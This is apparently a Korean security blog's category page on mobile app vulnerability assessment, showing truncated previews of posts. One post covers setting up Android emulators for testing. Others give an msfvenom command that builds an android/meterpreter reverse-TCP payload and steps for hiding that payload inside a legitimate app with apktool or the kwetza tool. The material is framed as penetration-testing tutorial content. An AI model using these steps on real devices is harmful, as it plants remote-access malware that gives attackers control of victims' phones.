본문 바로가기

4. 모바일 앱 취약점 진단5

안드로이드 가상환경을 구축하기 - Genymotion, 블루스택, Nox 1. 지니모션 https://www.genymotion.com/ Android Emulator on the Cloud and cross-platform - Genymotion Genymotion is an Android emulator "as a service" on the Cloud, as images for Cloud providers and locally for PC and Mac. www.genymotion.com 버추얼 박스와 같이 활용할 수 있는 지니 모션입니다. 버추얼 박스가 있는 경우 with virtual box 버전, 없으면 without으로 설치합니다. AVD처럼 가상 안드로이드 디바이스를 활용할 수 있기때문에 가상 안드로이드 모의해킹 환경을 만들기 좋습니다. 모든 기능을 사용하고자 .. 2023. 12. 28.
QR코드에 악성코드 주입하는 방법 https://blog.naver.com/dhwkffk/221963271849 QR코드에 악성코드 주입하는 방법 1.msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.0.0 lport=4444 R > QRc... blog.naver.com 2023. 12. 27.
안드로이드 앱에 악성코드 넣기 [kwetza] https://github.com/sensepost/kwetza GitHub - sensepost/kwetza: Python script to inject existing Android applications with a Meterpreter payload. Python script to inject existing Android applications with a Meterpreter payload. - GitHub - sensepost/kwetza: Python script to inject existing Android applications with a Meterpreter payload. github.com kwetza와 함께 apktool도 필요합니다. apktool은 apk 파일을 디컴파일 .. 2023. 12. 26.
Apktool을 활용 안드로이드 앱에 수동으로 악성코드 넣기 1.msfvenom의 android/meterpreter/reverse_tcp 를 이용 payload.apk를 생성한다. 2.폴더 안에 악성코드 넣을 앱 파일과 payload.apk를 넣고 apktool d payload.apk 와 apktool d 앱파일.apk 를 하여 디코딩 해준다. (apk는 압축파일과 비슷하므로 디코딩으로 풀어준다. 3.디코딩후 만들어진 폴더의 payload 폴더로 가서 smali/com/ 안의 metasploit 폴더를 복사해서 앱파일 폴더의 smali/com 안에 cp -r metasploit경로 . 명령어로 넣어준다. 4.두 개의 폴더 안의 Android 매니페스트 파일을 leafpad 등으로 열어주고 payload의 uses permission 에서 feature 까지 복.. 2023. 12. 26.